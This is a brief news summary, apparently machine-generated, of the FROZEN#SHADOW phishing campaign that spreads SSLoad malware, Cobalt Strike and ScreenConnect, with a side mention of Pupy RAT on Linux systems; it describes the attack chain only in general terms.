Researchers Detail Multistage Attack Hijacking Systems with SSLoad, Cobalt Strike

Researchers Detail Multistage Attack Hijacking Systems with SSLoad, Cobalt Strike

April 24, 2024 at 09:45AM

Cybersecurity researchers have uncovered an ongoing attack campaign, FROZEN#SHADOW, utilizing phishing emails to distribute SSLoad malware, Cobalt Strike, and ConnectWise ScreenConnect. The campaign targets organizations in Asia, Europe, and the Americas, using various methods to deliver malware and gain access to critical systems. The attackers’ persistence poses significant risks to victim organizations.

From the meeting notes on Apr 24, 2024, it is clear that there has been a significant discovery of an ongoing attack campaign using phishing emails to distribute malware named SSLoad. The campaign, codenamed FROZEN#SHADOW, also makes use of Cobalt Strike and ConnectWise ScreenConnect remote desktop software for deployment.

SSLoad is designed to infiltrate systems stealthily, gather sensitive information, deploy multiple backdoors and payloads, maintain persistence and avoid detection. The attack chains involve the use of phishing messages targeting organizations in Asia, Europe, and the Americas using JavaScript files and methods including website contact forms and macro-enabled Microsoft Word documents for distribution.

The obfuscated JavaScript file retrieves an MSI installer file by connecting to a network share and runs it to execute the SSLoad malware payload. The initial reconnaissance phase paves the way for Cobalt Strike, enabling the threat actors to remotely commandeer the host and acquire credentials.

The attackers have also been observed pivoting to other systems in the network, ultimately infiltrating the victim’s Windows domain by creating their own domain administrator account. This poses a significant risk and would be incredibly time consuming and costly to remediate.

In addition, the meeting notes mention the AhnLab Security Intelligence Center’s revelation of Linux systems being infected with an open-source remote access trojan called Pupy RAT.

The article also suggests following the publication on Twitter and LinkedIn for more exclusive content.

Full Article